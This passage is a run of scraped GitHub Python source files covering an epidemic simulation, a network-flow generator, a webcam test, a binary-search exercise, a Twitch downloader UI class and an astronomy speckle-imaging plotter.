1\n\t\t\tprint(self.daily)\n\t\t\tself.dailies.append(self.daily)\n\t\t\tself.totals.append(self.total)\n\t\t\tself.deaths.append(self.death)\n\t\t\tself.daily = 0\n\n\tdef update(self, delta):\n\t\tself.infect_people()\n\t\tself.update_people(delta)\n\n\t\tfor person in self.people:\n\t\t\tperson.draw()\n\n\t\tself.update_data()\n\n\n\tdef plot_cases_vs_time(self):\n\t\ttimes = np.arange(self.day_count)\n\n\t\tfig, cases = plt.subplots(3)\n\t\tfig.suptitle('Cases vs Time(days)')\n\n\t\tcases[0].plot(times, self.totals, label='total vs times')\n\t\tcases[0].set_title('total vs times')\n\n\t\tcases[1].plot(times, self.dailies,label='daily vs times')\n\t\tcases[1].set_title('daily vs times')\n\n\t\tcases[2].plot(times, self.deaths, label='deaths vs times')\n\t\tcases[2].set_title('death vs times')\n\n\t\tplt.legend()\n\t\tplt.show()\n\n\tdef draw(self):\n\n\t\tself.visualisation.Draw()\n\nclass 
person:\n\n\t'''type of input: location: string, age: int pb_travel:\n\tfloat in [0,1], travel_des: string (name of a country in the country dictionary)\n\tall is_ variables should be booleans\n\t'''\n\n\tdef __init__(self, position,\n\tis_legal=True, is_sick=False, radius=HUMAN_RADIUS):\n\n\t\tself.position = position\n\n\t\tself.speed = 0.2\n\t\tx = random.uniform(-self.speed,self.speed)\n\t\tabs_y = np.sqrt(self.speed**2-x**2)\n\t\ty = random.choice([-abs_y,abs_y])\n\t\tself.velocity = np.array([x,y])\n\n\t\tself.age = random.normalvariate(45, 14)\n\t\tself.is_legal = is_legal\n\t\tself.radius = radius\n\n\t\t# health statues\n\t\tself.is_alive = True # healthy ppl white\n\t\tself.is_sick = is_sick\n\t\tif is_sick:\n\t\t\tself.is_symptomatic = True\n\t\telse:\n\t\t\tself.is_symptomatic = False\n\t\tself.days_since_infected = 0\n\t\tself.is_quarantined = False # speed = 0\n\n\t\t# yellow for sick but not is_symptomatic n red otherwise\n\t\t# self.pb_die_today = 0 # float between 0 and 1\n\t\tself.is_immune = False # green\n\n\t\t# visualisation\n\t\tself.colour = self.find_colour()\n\t\tself.visualisation = PersonVisualisation(self.colour)\n\n\tdef update_health(self,delta):\n\n\t\t''' people might die or recorver the probability of recovering\n\t\ton their age and how long they have been sick for'''\n\n\t\tdeath_count = 0\n\t\trecorver_count = 0\n\t\tif self.is_alive and self.is_sick :\n\n\t\t\tself.days_since_infected += 0.2\n\t\t\tif self.is_symptomatic:\n\t\t\t\tif self.age < 40:\n\t\t\t\t\tif random.random() < 0.0002:\n\t\t\t\t\t\tself.is_alive = False\n\t\t\t\t\t\tdeath_count +=1\n\t\t\t\telif self.age < 50:\n\t\t\t\t\tif random.random() < 0.001:\n\t\t\t\t\t\tself.is_alive = False\n\t\t\t\t\t\tdeath_count +=1\n\t\t\t\telif self.age < 60:\n\t\t\t\t\tif random.random() < 0.0014:\n\t\t\t\t\t\tself.is_alive = False\n\t\t\t\t\t\tdeath_count +=1\n\t\t\t\telif self.age < 70:\n\t\t\t\t\tif random.random() < 0.0018:\n\t\t\t\t\t\tself.is_alive = False\n\t\t\t\t\t\tdeath_count +=1\n\t\t\t\telse:\n\t\t\t\t\tif random.random() < 0.00296:\n\t\t\t\t\t\tself.is_alive = False\n\t\t\t\t\t\tdeath_count +=1\n\n\t\t\telif self.days_since_infected > 14:\n\t\t\t\tself.is_symptomatic = True\n\n\t\t\tif self.days_since_infected >= 21:\n\t\t\t\tif random.random() < 0.1:\n\t\t\t\t\tself.is_sick = False\n\t\t\t\t\tself.is_immune = True\n\t\t\t\t\trecorver_count += 1\n\t\t\t\t\tself.is_symptomatic = False\n\n\t\treturn death_count, recorver_count\n\n\tdef update_velocity(self, another):\n\t\tself.velocity[0] = -another.velocity[0]\n\t\tself.velocity[1] = -another.velocity[1]\n\n\tdef update_position(self, delta):\n\t\tif self.is_quarantined or not self.is_alive:\n\t\t\treturn\n\t\tself.position += delta*self.velocity\n\n\tdef update(self, delta):\n\n\t\tself.update_position(delta)\n\t\tdeath_count,recorver_count = self.update_health(delta)\n\t\t# visualisation\n\t\tself.colour = self.find_colour()\n\t\tself.visualisation = PersonVisualisation(self.colour)\n\n\t\treturn death_count, recorver_count\n\tdef find_colour(self):\n\n\t\tcolour = [255,255,255]\n\n\t\tif not self.is_alive:\n\t\t\treturn [100,20,100]\n\n\t\tif self.is_sick:\n\n\t\t\tif self.is_quarantined:\n\t\t\t\tcolour = [0,0,255]\n\t\t\telif self.is_symptomatic:\n\t\t\t\tcolour = [255,0,0]\n\t\t\telse:\n\t\t\t\tcolour = [255,255,0]\n\t\telif self.is_immune:\n\t\t\tcolour = [0,255,0]\n\n\t\treturn colour\n\n\tdef draw(self):\n\n\t\tself.visualisation.Draw(self.position, HUMAN_RADIUS)\n\n# the following code has been taken and modified from 
lab2Visualisation.py\n\nresolution = 800\n\ndef Execute(updateFunction, runTime):\n\n\t'''\n\tinput: updateFunction: callable function,\n\trunTime: time in seconds of how long the pygame window should run for\n\t'''\n\n\tglobal window\n\tresolution = 800 \n\n\twindow = pg.display.set_mode((int(resolution*2),resolution))\n\twindow.fill([0,0,0])\n\n\tlastFrameTime = tm.process_time()\n\ttotalTime = 0\n\twhile totalTime < runTime:\n\n\t\ttimeStep = tm.process_time() - lastFrameTime\n\n\t\tlastFrameTime = tm.process_time()\n\n\t\twindow.fill([0,0,0])\n\n\t\t# print(timeStep)\n\t\tupdateFunction(timeStep)\n\n\t\tpg.display.update()\n\t\ttotalTime += timeStep\n\n\tpg.display.quit()\n\nclass PersonVisualisation:\n\n\tdef __init__(self, colour=[255,255,255]):\n\t\tself.colour = colour\n\t\tself.pixelPos = [400,400]\n\t\tself.pixelRad = 0\n\n\tdef Draw(self, position, radius):\n\n\t\tself.pixelRad = round(resolution*radius/2.0)\n\n\t\tself.pixelPos = [int(round(resolution*(position[0] + 1.0)/2.0)),\n\t\t int(round(resolution*(position[1] + 1.0)/2.0))]\n\n\t\tpg.draw.circle(window,self.colour,self.pixelPos,self.pixelRad)\n\nclass AreaVisualisation:\n\n\tdef __init__(self, location, colour=[255,255,255]):\n\t\tself.colour = colour\n\n\t\t(xMin, xMax, yMin, yMax) = location\n\t\tself.topRightX = round(resolution*(xMin + 1.0)/2.0)\n\t\tself.topRightY = round(resolution*(yMin + 1.0)/2.0)\n\t\tself.width = round(resolution*(xMax-xMin)/2.0)\n\t\tself.height = round(resolution*(yMax-yMin)/2.0)\n\n\tdef Draw(self):\n\n\t\tpg.draw.rect(window,self.colour,[self.topRightX,self.topRightY,self.width, self.height],1)\n\n\ndef update_world(delta):\n\t'''updates the entire world for each time step delta'''\n\n\tfor c in countries:\n\t\tc.draw()\n\tfor c in countries:\n\t\tc.update(delta)\n\n\n# intialise the world\n# default restrictions\n\nno_res = {'quarantine': False, 'reduce_travelling': False, 'area_restrictions': False}\nquarantine = {'quarantine': True, 'reduce_travelling': False, 'area_restrictions': False}\nred_tra = {'quarantine': False, 'reduce_travelling': True, 'area_restrictions': False}\narea_res = {'quarantine': False, 'reduce_travelling': False, 'area_restrictions': True}\nall = {'quarantine': True, 'reduce_travelling': True, 'area_restrictions': True}\nc1 = country('country1',no_res, 200, 0, [-1,0.99,-1,1])\n# c1 = country('country1',red_tra, 200, 0, [-1,0.99,-1,1])\n# c2 = country('count2', red_tra, 200, 0.7, [1.01,3,-1,1])\n# c2 = country('count2', red_tra, 200, 0.95, [1.01,3,-1,1])\n# c2 = country('count2', area_res, 200, 0.95, [1.01,3,-1,1])\nc2 = country('count2', all, 200, 0.80, [1.01,3,-1,1])\n\ncountries = [c1, c2]\n\nExecute(update_world, 60)\n\nfor c in countries:\n\tc.plot_cases_vs_time()\n\n","repo_name":"moyasui/covidproject","sub_path":"Epidemiology-final.py","file_name":"Epidemiology-final.py","file_ext":"py","file_size_in_byte":12943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71197385447","text":"import random\nn_files = 20\nn_nodes = 14\nrandom.seed(10)\n\nfor i in range(n_files):\n with open(f\"./flows/flows{i}.txt\" , 'w') as f:\n n_flows = 3\n rsd = random.sample(range(0,14), n_flows*2)\n ct = 0\n ar = []\n for i in range(n_flows):\n st = random.randint(1,20)\n priority = random.randint(1,50)\n duration = random.randint(20,40)\n bw = random.randint(15,35)\n src = rsd[ct]\n dst = rsd[ct+1]\n ct += 2\n ar.append([st,priority,duration,bw,src,dst])\n \n ar.sort(key=lambda x : x[0])\n for i in ar:\n 
f.write(f'{i[0]},{i[1]},{i[2]},{i[3]},{i[4]},{i[5]}' + \"\\n\")\n","repo_name":"Manoj-312002/sdn","sub_path":"topo/genfllow.py","file_name":"genfllow.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27421775305","text":"import cv2\nimport numpy as np\n\ncam = cv2.VideoCapture(0)\n\nwhile True:\n    __, frame = cam.read()\n    cv2.imshow(\"Feed\", frame)\n    k = cv2.waitKey(25)\n    if k == ord('q'): \n        break\n\ncam.release()\ncv2.destroyAllWindows()\n","repo_name":"HWU-Robo/pi-wars-workshops","sub_path":"Sensors/Video/cvTest.py","file_name":"cvTest.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73657642088","text":"\"\"\"\nThis problem was asked by Amazon.\n\nA sorted array of integers was rotated an unknown number of times.\n\nGiven such an array, find the index of the element in the array in faster than linear time.\nIf the element doesn't exist in the array, return null.\n\nFor example, given the array [13, 18, 25, 2, 8, 10] and the element 8, return 4 (the index of 8 in the array).\n\nYou can assume all the integers in the array are unique.\n\"\"\"\n\n\ndef findElement(elements, target):\n    left = 0\n    right = len(elements) - 1\n    # if elements[left] == element:\n    #     return left\n    # if elements[right] == element:\n    #     return right\n    while left <= right:\n        mid = (left + right) // 2\n        if elements[mid] == target:\n            return mid\n        if elements[mid] >= elements[left]:\n            if target >= elements[left] and target <= elements[mid]:\n                right = mid - 1\n            else:\n                left = mid + 1\n        else:\n            if target >= elements[mid] and target <= elements[right]:\n                left = mid + 1\n            else:\n                right = mid - 1\n    return None\n\n\nelements = [13, 18, 25, 2, 8, 10, 11, 12]\ntarget = 2\nans = findElement(elements, target)\nprint(ans)\n","repo_name":"anirudhsingla8/daily_coding_problem","sub_path":"daily_coding_problem_58.py","file_name":"daily_coding_problem_58.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20053130934","text":"from Core.Ui import *\nfrom Services.Messages import Messages\nfrom Services import ContentManager\nfrom Services.Twitch.GQL import TwitchGQLAPI\nfrom Services.Twitch.GQL.TwitchGQLModels import Channel, Stream, Video, Clip\nfrom Services.Twitch.Playback import TwitchPlaybackGenerator\nfrom Download.DownloadInfo import DownloadInfo\nfrom Download.Downloader import TwitchDownloader\nfrom Download.Downloader.Core.StreamDownloader import StreamDownloader\nfrom Download.Downloader.Core.VideoDownloader import VideoDownloader\nfrom Download.Downloader.Core.ClipDownloader import ClipDownloader\nfrom Download import ScheduledDownloadPreset\nfrom Ui.Components.Widgets.UpdateTrackInfoDisplay import UpdateTrackInfoDisplay\n\n\nclass DownloaderView(QtWidgets.QWidget):\n    resizedSignal = QtCore.pyqtSignal()\n\n    def __init__(self, parent: QtWidgets.QWidget | None = None):\n        super().__init__(parent=parent)\n        self._ui = UiLoader.load(\"downloaderView\", self)\n        self._ui.downloadInfoView = Utils.setPlaceholder(self._ui.downloadInfoView, Ui.DownloadInfoView(parent=self))\n        self._ui.alertIcon = Utils.setSvgIcon(self._ui.alertIcon, Icons.ALERT_RED_ICON)\n        self._ui.statusInfoButton.clicked.connect(self.showErrorInfo)\n        self._updateTrackInfoDisplay = UpdateTrackInfoDisplay(target=self._ui.updateTrackInfo, parent=self)\n        
self._downloader: StreamDownloader | VideoDownloader | ClipDownloader | None = None\n self._exception: Exception | None = None\n self.setStatusVisible(False)\n\n def connectDownloader(self, downloader: StreamDownloader | VideoDownloader | ClipDownloader) -> None:\n self.disconnectDownloader()\n self._downloader = downloader\n self._ui.downloadInfoView.showDownloadInfo(self._downloader.downloadInfo)\n self._updateTrackInfoDisplay.connectDownloader(self._downloader)\n self._downloader.status.updated.connect(self._updateStatus)\n self._downloader.progress.updated.connect(self._updateProgress)\n self._downloader.finished.connect(self._downloadFinishHandler)\n self._updateStatus()\n self._updateProgress()\n if self._downloader.isFinished():\n self._downloadFinishHandler()\n self.setStatusVisible(True)\n\n def disconnectDownloader(self) -> None:\n if self._downloader != None:\n self._updateTrackInfoDisplay.disconnectDownloader()\n self._downloader.status.updated.disconnect(self._updateStatus)\n self._downloader.progress.updated.disconnect(self._updateProgress)\n self._downloader.finished.disconnect(self._downloadFinishHandler)\n self._downloader = None\n\n def setStatusVisible(self, visible: bool) -> None:\n self._ui.statusArea.setVisible(visible)\n self.resizedSignal.emit()\n\n def _updateStatus(self) -> None:\n if self._downloader.status.terminateState.isInProgress():\n self.showStatus(T(\"stopping\" if isinstance(self._downloader, StreamDownloader) else \"canceling\", ellipsis=True))\n elif not self._downloader.status.pauseState.isFalse():\n if self._downloader.status.pauseState.isInProgress():\n self.showStatus(T(\"pausing\", ellipsis=True))\n else:\n self.showAlert(T(\"paused\"))\n elif self._downloader.status.isPreparing():\n self.showStatus(T(\"preparing\", ellipsis=True))\n elif self._downloader.status.isDownloading():\n self.showStatus(T(\"live-downloading\" if isinstance(self._downloader, StreamDownloader) else \"downloading\", ellipsis=True))\n\n def _updateProgress(self) -> None:\n if self._downloader.status.isPreparing():\n self.showProgress(0)\n elif isinstance(self._downloader, StreamDownloader):\n self.showProgress(None, self._downloader.progress.size)\n elif isinstance(self._downloader, VideoDownloader):\n if self._downloader.status.isDownloading() and not self._downloader.status.pauseState.isTrue():\n if self._downloader.downloadInfo.isUpdateTrackEnabled() and self._downloader.status.getWaitingCount() != -1:\n self.showProgress(None, self._downloader.progress.size)\n else:\n self.showProgress(self._downloader.progress.fileProgress, self._downloader.progress.size)\n else:\n self.showProgress(self._downloader.progress.sizeProgress, self._downloader.progress.size)\n self._updateDurationInfo()\n\n def _updateDurationInfo(self) -> None:\n if isinstance(self._downloader, StreamDownloader):\n self._ui.downloadInfoView.updateDurationInfo(self._downloader.progress.milliseconds)\n elif isinstance(self._downloader, VideoDownloader):\n self._ui.downloadInfoView.updateDurationInfo(\n totalMilliseconds=int(self._downloader.downloadInfo.content.lengthSeconds * 1000),\n progressMilliseconds=self._downloader.progress.milliseconds,\n cropRangeMilliseconds=self._downloader.downloadInfo.getCropRangeMilliseconds()\n )\n elif isinstance(self._downloader, ClipDownloader):\n return\n self._ui.downloadInfoView.showMutedInfo(self._downloader.progress.mutedFiles, self._downloader.progress.mutedMilliseconds)\n self._ui.downloadInfoView.showSkippedInfo(self._downloader.progress.skippedFiles, 
self._downloader.progress.skippedMilliseconds)\n self._ui.downloadInfoView.showMissingInfo(self._downloader.progress.missingFiles, self._downloader.progress.missingMilliseconds)\n\n def _downloadFinishHandler(self) -> None:\n if self._downloader.status.terminateState.isTrue():\n if isinstance(self._downloader.status.getError(), Exceptions.AbortRequested):\n if isinstance(self._downloader, StreamDownloader):\n self.setStatusVisible(False)\n else:\n self.showAlert(T(\"download-canceled\"))\n else:\n self.showError(self._downloader.status.getError(), downloadAborted=True)\n else:\n self.setStatusVisible(False)\n\n def showStatus(self, status: str) -> None:\n self._ui.alertIcon.hide()\n self._ui.status.setText(status)\n self._ui.statusInfoButton.hide()\n self._ui.progressBar.clearState()\n\n def showProgress(self, progress: int | None, fileSize: str | None = None) -> None:\n if progress == None:\n self._ui.progressBar.setRange(0, 0)\n else:\n self._ui.progressBar.setRange(0, 100)\n self._ui.progressBar.setValue(progress)\n if fileSize == None:\n self._ui.fileSize.hide()\n else:\n self._ui.fileSize.setText(fileSize)\n self._ui.fileSize.show()\n\n def showAlert(self, text: str) -> None:\n self._ui.alertIcon.show()\n self._ui.status.setText(text)\n self._ui.statusInfoButton.hide()\n self._ui.progressBar.showWarning()\n self.showProgress(100)\n\n def showError(self, exception: Exception | None, downloadAborted: bool = False) -> None:\n self._exception = exception\n if self._exception != None:\n self._ui.alertIcon.show()\n reasonText = self._getErrorReason()\n self._ui.status.setText(f\"{T('download-aborted')} ({T(reasonText)})\" if downloadAborted else T(reasonText))\n self._ui.statusInfoButton.show()\n self._ui.progressBar.showError()\n self.showProgress(100)\n\n def showErrorInfo(self) -> None:\n description = self._getErrorDescription()\n if description == None:\n if isinstance(self._exception, Exceptions.FileSystemError):\n Utils.info(*Messages.INFO.FILE_SYSTEM_ERROR, parent=self)\n elif isinstance(self._exception, Exceptions.NetworkError):\n Utils.info(*Messages.INFO.NETWORK_ERROR, parent=self)\n elif isinstance(self._exception, Exceptions.ProcessError):\n Utils.info(\"process-error\", \"#Process exited unexpectedly.\\n\\nPossible Causes\\n\\n* Corruption of the original file\\n* Invalid crop range\\n* Too long or invalid filename or path\\n* Out of memory\\n* Out of storage capacity\\n* Lack of device performance\\n* Needs permission to perform this action\\n\\nIf the error persists, try Run as administrator.\", parent=self)\n elif isinstance(self._exception, TwitchGQLAPI.Exceptions.AuthorizationError):\n if App.Account.isLoggedIn():\n Utils.info(*Messages.INFO.AUTHENTICATION_ERROR, parent=self)\n else:\n Utils.info(*Messages.INFO.TEMPORARY_ERROR, parent=self)\n else:\n Utils.info(\"error\", \"#An error occurred while downloading.\", parent=self)\n else:\n Utils.info(\"unable-to-download\", description, contentTranslate=False, parent=self)\n\n def _getErrorReason(self) -> str:\n if isinstance(self._exception, Exceptions.FileSystemError):\n return \"system-error\"\n elif isinstance(self._exception, Exceptions.NetworkError):\n return \"network-error\"\n elif isinstance(self._exception, Exceptions.ProcessError):\n return \"process-error\"\n elif isinstance(self._exception, ContentManager.Exceptions.RestrictedContent):\n return \"restricted-content\"\n elif isinstance(self._exception, ScheduledDownloadPreset.Exceptions.PreferredResolutionNotFound):\n return \"preferred-resolution-not-found\"\n 
elif isinstance(self._exception, TwitchDownloader.Exceptions.DownloaderCreationDisabled):\n return \"disabled-feature\"\n else:\n return \"unexpected-error\"\n\n def _getErrorDescription(self) -> str | None:\n if isinstance(self._exception, TwitchPlaybackGenerator.Exceptions.Forbidden):\n if App.Account.isLoggedIn():\n return f\"{T('#Authentication of your account has been denied.')}\\n\\n{T('reason')}: {self._exception.reason}\"\n else:\n return f\"{T('#Authentication denied.')}\\n\\n{T('reason')}: {self._exception.reason}\"\n elif isinstance(self._exception, TwitchPlaybackGenerator.Exceptions.GeoBlock):\n return f\"{T('#This content is not available in your region.')}\\n\\n{T('reason')}: {self._exception.reason}\"\n elif isinstance(self._exception, TwitchPlaybackGenerator.Exceptions.ChannelNotFound):\n return T(\"#Channel not found. Deleted or temporary error.\")\n elif isinstance(self._exception, ContentManager.Exceptions.RestrictedContent):\n if self._exception.restrictionType == ContentManager.RestrictionType.CONTENT_TYPE:\n restrictionType = T(\"#Downloading {contentType} from this channel has been restricted by the streamer({channel})'s request or by the administrator.\", channel=self._exception.channel.displayName, contentType=T(self._exception.contentType))\n else:\n restrictionType = T(\"#This content has been restricted by the streamer({channel})'s request or by the administrator.\", channel=self._exception.channel.displayName)\n restrictionInfo = T(\"#To protect the rights of streamers, {appName} restricts downloads when a content restriction request is received.\", appName=Config.APP_NAME)\n message = f\"{restrictionType}\\n\\n{restrictionInfo}\"\n if self._exception.reason != None:\n message = f\"{message}\\n\\n[{T('reason')}]\\n{self._exception.reason}\"\n return message\n elif isinstance(self._exception, ScheduledDownloadPreset.Exceptions.PreferredResolutionNotFound):\n return T(\"#The preferred resolution was not found.\\nYou have disabled the download until a matching resolution is found.\")\n elif isinstance(self._exception, TwitchDownloader.Exceptions.DownloaderCreationDisabled):\n return T(\"#Unable to start a new download.\\nThis feature has been disabled.\")\n else:\n return None\n\n def updateContentInfo(self, content: Channel | Stream | Video | Clip | DownloadInfo | None, immediateRefresh: bool = True) -> None:\n if isinstance(content, DownloadInfo):\n self._ui.downloadInfoView.showDownloadInfo(content, immediateRefresh=immediateRefresh)\n else:\n self._ui.downloadInfoView.showContentInfo(content, immediateRefresh=immediateRefresh)\n if self._downloader != None:\n self._updateDurationInfo()","repo_name":"devhotteok/TwitchLink","sub_path":"Ui/DownloaderView.py","file_name":"DownloaderView.py","file_ext":"py","file_size_in_byte":12467,"program_lang":"python","lang":"en","doc_type":"code","stars":287,"dataset":"github-code","pt":"53"} +{"seq_id":"31589354537","text":"import os\nimport sys\nimport numpy as np\nimport warnings\nfrom astropy.io import fits\nfrom astropy.utils.exceptions import AstropyWarning\nimport matplotlib.pyplot as pl\nfrom matplotlib.colors import LogNorm\nfrom seaborn.cm import mako\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\nimport glob\nfrom matplotlib import rcParams\nrcParams[\"savefig.dpi\"] = 150\nrcParams[\"figure.dpi\"] = 150\nif sys.platform == 'linux':\n pl.rcParams['font.family'] = 'Liberation Sans'\nelif sys.platform == 'darwin':\n pl.rcParams['font.family'] = 'Arial'\n\nwarnings.simplefilter('ignore', 
AstropyWarning)\nwarnings.simplefilter('ignore', UserWarning)\n\n\ndef normalize_01(im):\n\n return (im - im.min())/(im.max() - im.min())\n\n\nclass Speckle:\n\n def __init__(self, name, data_dir, inst=\"NESSI\"):\n\n self.name = name\n self.data_dir = data_dir\n self.inst = inst\n if inst == \"NESSI\":\n self.blue_name = 'b'\n self.red_name = 'r'\n self.blue_wav = 562\n self.red_wav = 832\n self.skiprows = 19\n elif inst == \"DSSI\":\n self.blue_name = 'a'\n self.red_name = 'b'\n self.blue_wav = 692\n self.red_wav = 880\n self.skiprows = 33\n elif inst == \"Zorro\":\n self.blue_name = 'b'\n self.red_name = 'r'\n self.blue_wav = 562\n self.red_wav = 832\n self.skiprows = 29\n elif inst == \"Alopeke\":\n self.blue_name = '562'\n self.red_name = '832'\n self.blue_wav = 562\n self.red_wav = 832\n self.skiprows = 29\n\n self._load(name, data_dir)\n\n def _load(self, name, data_dir):\n\n print(\"Loading {} data\".format(name))\n\n fp = glob.glob(os.path.join(data_dir, '{}*{}.fits'.format(name, self.blue_name)))[0]\n hl = fits.open(fp)\n self._fits_b = hl\n self._im_b = normalize_01(hl[0].data)\n self._hdr_b = hl[0].header\n\n fp = glob.glob(os.path.join(data_dir, '{}*{}.fits'.format(name, self.red_name)))[0]\n hl = fits.open(fp)\n self._fits_r = hl\n self._im_r = normalize_01(hl[0].data)\n self._hdr_r = hl[0].header\n\n fp = glob.glob(os.path.join(data_dir, '{}*{}*.dat'.format(name, self.blue_name)))[0]\n self._cc_b = np.loadtxt(fp, skiprows=self.skiprows)\n\n fp = glob.glob(os.path.join(data_dir, '{}*{}*.dat'.format(name, self.red_name)))[0]\n self._cc_r = np.loadtxt(fp, skiprows=self.skiprows)\n\n print(\"Data taken on {}\".format(self.obs_date))\n\n\n @property\n def obs_date(self):\n return self._hdr_r['DATE-OBS']\n\n\n def plot(self, figsize=(5,3.5), title=None, fp=None, stretch=1, vrange=None, cmap=None, c1='#01cdfe', c2='#ff71ce'):\n\n # colors = ['navy', 'turquoise', 'darkorange']\n colors = [c1, c2]\n\n if vrange is None:\n vrange = 0.1, 99.9\n\n if cmap is None:\n cm = mako\n elif cmap == 'gray':\n cm = pl.cm.gray\n elif cmap == 'gray_r':\n cm = pl.cm.gray_r\n\n fontsize=30\n pl.style.use('seaborn-ticks')\n\n # rcParams['font.family'] = 'serif'\n rcParams['axes.facecolor'] = 'white'\n rcParams[\"xtick.direction\"] = 'in'\n rcParams[\"ytick.direction\"] = 'in'\n\n if title is None:\n title = self.name\n\n fig,ax = pl.subplots(1, 1, figsize=figsize)\n\n rho, theta = self._cc_b.T\n ax.plot(rho, theta, label=f'{self.blue_wav} nm', color=colors[0], lw=2)\n\n rho, theta = self._cc_r.T\n ax.plot(rho, theta, label=f'{self.red_wav} nm', color=colors[1], lw=2)\n ax.invert_yaxis()\n ax.xaxis.set_ticks_position('both')\n ax.yaxis.set_ticks_position('both')\n ax.minorticks_on()\n\n ax1 = inset_axes(ax, 4.4, 1.3, borderpad=2)\n vmin, vmax = np.percentile(self._im_b, vrange[0]), np.percentile(self._im_b, vrange[1])\n im = ax1.imshow(self._im_b, cmap=cm, norm=LogNorm(vmin=vmin, vmax=vmax), interpolation='none', origin='lower')\n ax1.xaxis.set_visible(False)\n ax1.yaxis.set_visible(False)\n ax1.set_title(f'{self.blue_wav} nm', fontsize=10)\n# pixscale = 0.0175649 # arcsec/pixel\n pixscale = self._hdr_b['PIXSCL']\n arcsec = int(round(1/pixscale))\n xl, yl = ax1.get_xlim(), ax1.get_ylim()\n xcoord = [xl[1]-1.3*arcsec, xl[1]-0.3*arcsec]\n ycoord = [yl[0]+0.07*np.diff(yl), yl[0]+0.07*np.diff(yl)]\n ax1.plot(xcoord, ycoord, color='white')\n if self.inst == \"NESSI\":\n ax1.text(xcoord[0]*0.98, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n elif self.inst == \"DSSI\":\n ax1.text(xcoord[0]*1.08, 
ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n elif self.inst == \"Zorro\":\n ax1.text(xcoord[0]*1.12, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n elif self.inst == \"Alopeke\":\n ax1.text(xcoord[0]*1.12, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n\n ax2 = inset_axes(ax, 1.3, 1.3, borderpad=2)\n vmin, vmax = np.percentile(self._im_r, vrange[0]), np.percentile(self._im_r, vrange[1])\n im = ax2.imshow(self._im_r, cmap=cm, norm=LogNorm(vmin=vmin, vmax=vmax), interpolation='none', origin='lower')\n ax2.xaxis.set_visible(False)\n ax2.yaxis.set_visible(False)\n ax2.set_title(f'{self.red_wav} nm', fontsize=10)\n# pixscale = 0.0181887 # arcsec/pixel\n pixscale = self._hdr_r['PIXSCL']\n arcsec = int(round(1/pixscale))\n xl, yl = ax2.get_xlim(), ax2.get_ylim()\n xcoord = [xl[1]-1.3*arcsec, xl[1]-0.3*arcsec]\n ycoord = [yl[0]+0.07*np.diff(yl), yl[0]+0.07*np.diff(yl)]\n ax2.plot(xcoord, ycoord, color='white')\n if self.inst == \"NESSI\":\n ax2.text(xcoord[0]*0.98, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n elif self.inst == \"DSSI\":\n ax2.text(xcoord[0]*1.08, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n elif self.inst == \"Zorro\":\n ax2.text(xcoord[0]*1.12, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n elif self.inst == \"Alopeke\":\n ax2.text(xcoord[0]*1.12, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n\n yl = ax.get_ylim()\n ylim = (stretch * yl[0], yl[1])\n pl.setp(ax,\n title=title,\n xlabel='Separation [arcsec]',\n ylabel=r'$\\Delta$mag',\n xlim=(rho.min(), rho.max()),\n ylim=ylim)\n\n ax.legend(loc='lower left', frameon=False)\n\n if fp is None:\n fp = '{}_{}.png'.format(self.name, self.obs_date)\n\n fig.tight_layout()\n fig.savefig(fp, dpi=400)\n pl.close()\n\n print(\"Wrote file: {}\".format(fp))\n\n\ndef cli():\n\n import sys\n import time\n tick = time.time()\n\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Plot speckle imaging data\")\n parser.add_argument('-i', '--id', help='ID', type=str, default=None)\n parser.add_argument('-d', '--data_dir', help='Directory containing the data products',\n type=str, default='.')\n parser.add_argument('-s', '--stretch', help='y-axis stretch factor (default=1)', type=float, default=1)\n parser.add_argument('-n', '--name', help='Target name', type=str, default=None)\n parser.add_argument('-v', '--vrange', help='Log stretch vrange', type=str, default=None)\n parser.add_argument('-c', '--cmap', help='Color map name', type=str, default=None)\n parser.add_argument('-f', '--figsize', help='Figure size (comma-separated)', type=str, default='5,3.5')\n parser.add_argument('--inst', help='Instrument name', type=str, default='NESSI')\n args = parser.parse_args()\n\n if args.id is None:\n sys.exit('Must supply ID')\n\n id_ = args.id\n data_dir = args.data_dir\n stretch = args.stretch\n name = args.name\n vrange = args.vrange\n cmap = args.cmap\n inst = args.inst\n figsize = [float(i) for i in args.figsize.split(',')]\n\n if vrange is not None:\n vrange = list(map(float,vrange.split(',')))\n\n spkl = Speckle(id_, data_dir, inst=inst)\n spkl.plot(figsize=figsize, title=name, stretch=stretch, vrange=vrange, cmap=cmap)\n\n print(\"Script executed in {0:.1f} seconds\\n\".format(time.time() - tick))\n","repo_name":"john-livingston/speckle","sub_path":"speckle/speckle.py","file_name":"speckle.py","file_ext":"py","file_size_in_byte":8352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
